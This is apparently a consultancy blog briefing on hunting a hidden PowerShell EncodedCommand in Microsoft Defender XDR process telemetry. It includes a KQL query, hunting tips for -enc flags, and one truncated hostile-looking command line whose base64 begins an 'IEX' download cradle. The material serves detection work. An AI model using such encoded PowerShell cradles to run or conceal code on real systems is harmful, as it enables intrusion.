Microsoft Defender XDR • DeviceProcessEvents • PowerShell Investigation

The EncodedCommand Was Buried In Noise

The endpoint looked healthy.

No high-severity alert fired. No ransomware was detected. No incident was created.

But inside thousands of normal process events, one PowerShell EncodedCommand was waiting to be found.

The command was not hidden by encryption. It was hidden by noise.

Discuss your environment Back to briefings

Agent Foskett investigation into PowerShell EncodedCommand activity buried in Microsoft Defender XDR process telemetry

Briefing summary

A workstation generated thousands of legitimate process events. Agent Foskett reviewed PowerShell activity inside DeviceProcessEvents and found a single EncodedCommand hidden amongst routine administration, software deployment and endpoint management noise.

PowerShell command-line analysis

DeviceProcessEvents hunting

Suspicious activity hidden by volume

What happened

The endpoint looked healthy. The dashboard stayed quiet. The suspicious command was present the whole time.

The endpoint looked healthy The device was reporting normally. Microsoft Defender showed no active incident and no user had reported a problem.

PowerShell was everywhere Management scripts, software deployments, monitoring tools and security automation generated regular PowerShell activity.

Nothing looked urgent The suspicious activity blended into normal operations. No single event stood out until the command lines were reviewed.

The query that started the investigation

Agent Foskett started with PowerShell process activity and followed the command line.

DeviceProcessEvents
| where Timestamp > ago(7d)
| where FileName =~ "powershell.exe"
| project Timestamp, DeviceName, InitiatingProcessFileName, ProcessCommandLine
| order by Timestamp desc

Hundreds of rows returned The query did not reveal a dramatic alert. It returned normal-looking activity from a busy endpoint environment.

The command line mattered The process name alone was not enough. ProcessCommandLine showed what PowerShell had actually been asked to do.

The noise was the hiding place The suspicious command was not invisible. It was simply surrounded by thousands of ordinary events.

One command looked different

Most commands looked like routine administration. One row did not.

powershell.exe -EncodedCommand SQBFAFgAKABOAGU...
// nearby noise: Install-Module
// nearby noise: Intune Management Extension
// nearby noise: Defender remediation task
// the suspicious command was just another row

The command was encoded EncodedCommand does not automatically prove compromise, but it does make the intent harder to understand at a glance.

The row was easy to miss It appeared between legitimate management actions and could easily have been dismissed as routine scripting.

The investigation changed Once the command was isolated, the question changed from whether PowerShell ran to what PowerShell executed.

Agent Foskett moment

The attacker did not hide the command particularly well. They hid it among everything else.

Encoding was not the only trick The encoded text was visible. The PowerShell process was visible. The execution chain was visible. The telemetry existed the entire time.

Volume created the camouflage Thousands of normal events surrounded the suspicious command. The noise made the unusual behaviour feel ordinary.

The command became evidence Once decoded and placed into the timeline, the command was no longer just text. It became part of the investigation.

What it was not It was not a dramatic ransomware alert, a named malware family or an obvious high-severity incident.

What it might have been It may have been suspicious script execution, staged download behaviour, hands-on-keyboard activity or post-compromise automation.

Why it mattered Modern attacks often succeed because defenders stop at the dashboard instead of following the behaviour hidden in the telemetry.

Following the execution chain

The process name rarely tells the full story. The parent, child and network activity often do.

Review the parent process Determine what launched PowerShell and whether that parent process normally creates scripted child activity.

Decode and inspect intent Extract the encoded content, decode it safely and look for download, execution, credential access or persistence behaviour.

Correlate network activity Check whether network connections, downloads or suspicious remote hosts appeared shortly after the encoded command ran.

What most environments miss

Visibility alone is not enough when legitimate administration creates constant noise.

PowerShell is not automatically bad Many environments rely on PowerShell for management, deployment, security automation and support tasks.

EncodedCommand is not automatically safe Administrative use exists, but attackers also use encoding to slow down human interpretation and hide intent.

Noise is an attacker advantage When analysts are overloaded by normal telemetry, unusual behaviour can hide in plain sight.

How defenders can investigate it

Start with the command line, then rebuild the behaviour around it.

Hunt for encoded commands Search ProcessCommandLine for EncodedCommand, -enc, -e and other PowerShell encoding variations.

Compare against normal activity Separate known management scripts from unusual execution chains, strange parents and unexpected users or devices.

Reconstruct the timeline Place the encoded command beside file, network, logon and process events to understand what happened next.

Related investigations

The PowerShell Command Was Base64 Encoded A deeper look at encoded PowerShell, DeviceProcessEvents and command-line analysis in Microsoft Defender XDR. Read more →

The Child Process Shouldn't Have Existed A trusted application launched a child process that changed the investigation completely. Read more →

The Process Tree Told The Real Story Parent-child relationships can reveal execution chains that individual alerts may never explain. Read more →

The Device Was Talking To Something It Shouldn't Network telemetry can reveal what a device reached after suspicious execution occurred. Read more →

The Connection Happened At 1:22AM Time can change the meaning of a connection that might otherwise look normal. Read more →

Investigating DeviceProcessEvents Learn how Defender XDR process telemetry helps defenders investigate execution behaviour. Read more →

Final thought

The command was not invisible. It was waiting for someone to care enough to look.

At GEMXIT We help organisations investigate Microsoft Defender XDR telemetry, PowerShell execution, endpoint behaviour, suspicious command lines and hidden activity across Microsoft security environments. If you want to understand how this applies to your environment, see our Cyber Security services.

Agent Foskett mindset Do not only ask whether PowerShell ran. Ask who launched it, what command was passed, whether it was encoded, what happened next and whether the behaviour belongs in that environment.

A single EncodedCommand was buried inside thousands of process events. Explore related investigations including The PowerShell Command Was Base64 Encoded, The Child Process Shouldn't Have Existed, and The Process Tree Told The Real Story.

Develop IT. Protect IT. GEMXIT PTY LTD | GEMXIT UK LTD